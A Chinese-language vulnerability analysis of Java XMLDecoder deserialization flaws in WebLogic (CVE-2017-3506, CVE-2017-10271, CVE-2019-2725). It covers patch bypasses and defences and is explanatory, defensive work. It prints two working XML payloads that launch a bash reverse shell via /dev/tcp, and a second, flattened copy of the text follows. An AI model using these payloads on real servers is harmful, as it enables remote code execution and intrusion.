XMLDecoder反序列化漏洞分析与防护

漏洞概述

XMLDecoder是Java提供的一个用于将XML编码数据转换为Java对象的工具类。由于设计缺陷，当处理恶意构造的XML数据时，可能导致远程代码执行(RCE)漏洞。这类漏洞在WebLogic等中间件中多次出现，形成了多个CVE编号。

漏洞原理分析

基本利用方式

XMLDecoder通过readObject()方法解析XML数据并还原Java对象。攻击者可以构造特殊的XML来执行任意代码：

<java version="1.4.0" class="java.beans.XMLDecoder">
  <object class="java.lang.ProcessBuilder">
    <array class="java.lang.String" length="3">
      <void index="0"><string>/bin/bash</string></void>
      <void index="1"><string>-c</string></void>
      <void index="2"><string>bash -i &gt;&amp; /dev/tcp/127.0.0.1/2333 0&gt;&amp;1</string></void>
    </array>
    <void method="start"/></void>
  </object>
</java>

关键元素解析

XMLDecoder支持多种元素来创建对象实例：

object元素：直接创建指定类的实例
void元素：可用于代替object元素
new元素：也可用于代替object元素
class元素：获取类对象

处理流程

XML解析器(SAXParser)解析XML文档
根据元素类型选择对应的ElementHandler
在endElement时调用handler的getValueObject方法
通过反射机制实例化对象并执行方法

漏洞演变历史

CVE-2017-3506

漏洞点：直接使用object元素创建ProcessBuilder实例

补丁：黑名单过滤object元素

public void startElement(String uri, String localName, String qName, Attributes attributes) throws SAXException {
    if (qName.equalsIgnoreCase("object")) {
        throw new IllegalStateException("Invalid context type: object");
    }
}

CVE-2017-10271

绕过方式：使用void元素代替object元素

<java version="1.4.0" class="java.beans.XMLDecoder">
  <void class="java.lang.ProcessBuilder">
    <array class="java.lang.String" length="3">
      <void index="0"><string>/bin/bash</string></void>
      <void index="1"><string>-c</string></void>
      <void index="2"><string>bash -i &gt;&amp; /dev/tcp/127.0.0.1/2333 0&gt;&amp;1</string></void>
    </array>
    <void method="start"/></void>
  </void>
</java>

补丁增强：增加了对void、new、method等元素的限制

CVE-2019-2725

绕过方式：利用class元素配合UnitOfWorkChangeSet类进行反序列化

限制条件：

method元素被禁用
array元素只能用于byte数组

利用类特征：

构造函数接受字节数组
包含反序列化或反射操作

技术深入分析

ElementHandler机制

XMLDecoder使用不同的ElementHandler处理各类XML元素：

NewElementHandler：处理new元素
ObjectElementHandler：处理object元素
VoidElementHandler：处理void元素
ClassElementHandler：处理class元素

关键方法：

addAttribute()：处理元素属性
getValueObject()：在元素结束时获取对象值

替代元素原理

void/new元素能替代object元素的原因在于：

它们都继承自ObjectElementHandler或NewElementHandler
都能通过class属性获取类对象
都能通过反射实例化类并调用方法

数组处理限制

补丁后array元素限制：

class属性只能是"byte"
长度限制(MAXARRAYLENGTH和OVERALLMAXARRAYLENGTH)

防护方案

官方补丁方案

黑名单过滤危险元素(object, class, new, method等)
限制void元素只能使用index属性
限制array元素只能用于byte数组
设置数组长度上限

根本解决方案

避免使用XMLDecoder解析不可信数据
使用白名单机制替代黑名单
升级到最新安全版本
实施输入验证和过滤

漏洞影响范围

JDK 1.4至JDK 11均受影响
使用XMLDecoder的应用程序，特别是WebLogic等中间件

总结

XMLDecoder反序列化漏洞展示了黑名单防护的局限性，通过多次绕过证明了设计缺陷的根本性问题。开发者应当避免使用不安全的反序列化机制，或实施严格的白名单控制。

XMLDecoder反序列化漏洞分析与防护漏洞概述 XMLDecoder是Java提供的一个用于将XML编码数据转换为Java对象的工具类。由于设计缺陷，当处理恶意构造的XML数据时，可能导致远程代码执行(RCE)漏洞。这类漏洞在WebLogic等中间件中多次出现，形成了多个CVE编号。漏洞原理分析基本利用方式 XMLDecoder通过 readObject() 方法解析XML数据并还原Java对象。攻击者可以构造特殊的XML来执行任意代码：关键元素解析 XMLDecoder支持多种元素来创建对象实例： object元素：直接创建指定类的实例 void元素：可用于代替object元素 new元素：也可用于代替object元素 class元素：获取类对象处理流程 XML解析器(SAXParser)解析XML文档根据元素类型选择对应的ElementHandler 在endElement时调用handler的getValueObject方法通过反射机制实例化对象并执行方法漏洞演变历史 CVE-2017-3506 漏洞点：直接使用object元素创建ProcessBuilder实例补丁：黑名单过滤object元素 CVE-2017-10271 绕过方式：使用void元素代替object元素补丁增强：增加了对void、new、method等元素的限制 CVE-2019-2725 绕过方式：利用class元素配合UnitOfWorkChangeSet类进行反序列化限制条件： method元素被禁用 array元素只能用于byte数组利用类特征：构造函数接受字节数组包含反序列化或反射操作技术深入分析 ElementHandler机制 XMLDecoder使用不同的ElementHandler处理各类XML元素： NewElementHandler ：处理new元素 ObjectElementHandler ：处理object元素 VoidElementHandler ：处理void元素 ClassElementHandler ：处理class元素关键方法： addAttribute() ：处理元素属性 getValueObject() ：在元素结束时获取对象值替代元素原理 void/new元素能替代object元素的原因在于：它们都继承自ObjectElementHandler或NewElementHandler 都能通过class属性获取类对象都能通过反射实例化类并调用方法数组处理限制补丁后array元素限制： class属性只能是"byte" 长度限制(MAXARRAYLENGTH和OVERALLMAXARRAYLENGTH) 防护方案官方补丁方案黑名单过滤危险元素(object, class, new, method等) 限制void元素只能使用index属性限制array元素只能用于byte数组设置数组长度上限根本解决方案避免使用XMLDecoder解析不可信数据使用白名单机制替代黑名单升级到最新安全版本实施输入验证和过滤漏洞影响范围 JDK 1.4至JDK 11均受影响使用XMLDecoder的应用程序，特别是WebLogic等中间件总结 XMLDecoder反序列化漏洞展示了黑名单防护的局限性，通过多次绕过证明了设计缺陷的根本性问题。开发者应当避免使用不安全的反序列化机制，或实施严格的白名单控制。